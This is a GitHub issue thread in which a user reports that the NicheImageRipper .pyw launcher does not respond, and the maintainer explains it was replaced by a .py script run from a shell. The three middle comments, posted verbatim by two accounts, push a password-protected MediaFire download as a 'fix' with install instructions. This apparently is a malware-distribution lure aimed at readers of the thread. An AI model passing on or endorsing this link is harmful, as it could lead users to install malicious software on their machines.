### ISSUE TITLE
Clicking NicheImageRipper.pyw but no respond

### ISSUE THREAD

**Issue by Rounlet** [Exiua/NicheImageRipper#25]
I have Python310 and Python312 versions.
I've tried clicking NicheImageRipper.pyw but it's not responding at all.

I need your help!

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Exiua** [comment]
I have just released an update that includes many changes to the program. One of these changes replaces `NicheImageRipper.pyw` with  `NicheImageRipper.py` (different extension). As a result, the program must be run from a shell (e.g.,`python3 NicheImageRipper.py`). If you are on Windows, you can use Powershell or Command Prompt to start the program. 

Let me know if you have any other issues with this program
